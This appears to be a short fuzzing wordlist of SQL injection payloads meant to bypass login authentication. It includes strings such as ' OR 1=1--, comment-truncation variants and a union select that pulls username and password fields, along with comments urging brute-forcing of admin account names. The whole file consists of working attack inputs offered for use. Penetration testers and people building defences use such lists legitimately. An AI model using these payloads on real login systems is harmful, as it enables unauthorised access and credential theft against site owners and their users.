9 lines
374 B
Plaintext
9 lines
374 B
Plaintext
# regex replace as many as you can with your fuzzer for best results:
|
|
# <user-fieldname> <pass-fieldname> <username>
|
|
# also try to brute force a list of possible usernames, including possile admin acct names
|
|
<username>' OR 1=1--
|
|
'OR '' = ' Allows authentication without a valid username.
|
|
<username>'--
|
|
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
|
|
'OR 1=1--
|